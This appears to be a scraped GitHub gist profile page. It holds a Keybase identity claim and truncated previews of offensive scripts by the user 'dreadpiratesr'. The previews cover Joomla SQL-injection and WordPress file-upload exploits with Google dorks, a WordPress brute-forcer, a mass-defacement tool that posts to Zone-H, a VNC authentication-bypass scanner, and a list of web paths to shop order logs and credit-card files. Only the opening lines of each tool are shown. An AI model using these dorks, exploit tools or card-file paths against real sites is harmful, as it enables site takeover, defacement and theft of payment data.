I hereby claim:
- I am dreadpiratesr on github.
- I am dreadpiratesr (https://keybase.io/dreadpiratesr) on keybase.
- I have a public key whose fingerprint is 3A74 1C92 2992 DC81 5C77 0E45 5C83 1AF6 AE26 CC2C
To claim this, I am signing this object:
| #!/usr/bin/perl | |
| #Exploit title: Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit | |
| #Google Dork: inurl:index.php?option=com_s5clanroster& | |
| #Vendor HomePage: http://www.joomla.org/ | |
| system("clear"); | |
| system("cls"); | |
| print "=========================================================\n"; | |
| print "* Joomla S5 Clan Roster com_s5clanroster SQL Injection *\n"; | |
| print "* Coded dreadpiratesr *\n"; | |
| print "* *\n"; |
| #!/usr/bin/perl | |
| # WP-BRUTE BY DPR | |
| # dreadpiratesr | |
| use LWP::UserAgent; | |
| $site = $ARGV[0]; | |
| $user = $ARGV[1]; | |
| $wordl = $ARGV[2]; |
| #!/usr/bin/perl | |
| #EXPLOIT: http://www.exploit4arab.net/exploits/1433 | |
| use LWP::UserAgent; | |
| use strict; | |
| use warnings; | |
| sub banner { | |
| print "[!] [ EXPLOIT NAME ]: Wordpress event Calendar Plugin - (AFU)Arbitrary File Upload / EDIT GoogleINURL\n"; | |
| print "[!] [ usage ]: perl $0 www.target.gov.crot backdoor.php.gif\n"; | |
| print "--------------------------------------------------------------------------------------------------------------------\n"; |
| #!/usr/bin/perl | |
| # Themes Mass Exploiter Wordpress & Auto Post Zone-h | |
| # Upload File and Submit your defacements on Zone-H | |
| # TEAM : dreadpiratesr | |
| # https://twitter.com/blackmarketi2p | |
| # Author : dpr | |
| # USAGE => perl bt.pl | |
| use HTTP::Request; | |
| use LWP::Simple; |
| #!/usr/bin/perl | |
| use LWP::UserAgent; | |
| use LWP::Simple; | |
| use strict; | |
| use warnings; | |
| use threads; | |
| use threads::shared; | |
| use Config; | |
| use HTML::TreeBuilder; |
| #!/usr/bin/perl | |
| # Scanner VNC - OpenVNC 4.11 authentication bypass By GhOsTrIaX | |
| use strict; | |
| use warnings; | |
| use IO::Socket; | |
| use threads; | |
| use threads::shared; | |
| use Errno qw(EAGAIN); |
| Exploit Title: Supercon Direct login to admin panel without entering password | |
| Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices” | |
| Product Description | |
| ——————- | |
| Supercon delivers high quality, reliable and cost-effective IT services to customers globally. | |
| We provide world-class technology services by constantly exploring and implementing innovative | |
| solutions that drive long-term value to our customers. We have been providing solutions to clients | |
| across the globe for more than 5 years and boast of our extensive | |
| experience on website designing and development projects. |
| /cgi-bin/DCShop/Orders/orders.txt | |
| /vpasp/shopdbtest.asp | |
| /orders/checks.txt | |
| /WebShop/logs | |
| /ccbill/secure/ccbill.log /scripts/cart32.exe | |
| /cvv2.txt | |
| /cart/shopdbtest.asp | |
| /cgi-win/cart.pl | |
| /shopdbtest.asp | |
| /WebShop/logs/cc.txt /cgi-local/cart.pl |
| import socket | |
| import random | |
| import os, sys | |
| import threading | |
| if sys.platform == 'linux' or sys.platform == 'linux2': | |
| clearing = ' clear' | |
| else: | |
| clearing = 'cls' | |
| os.system(clearing) |
I hereby claim:
To claim this, I am signing this object: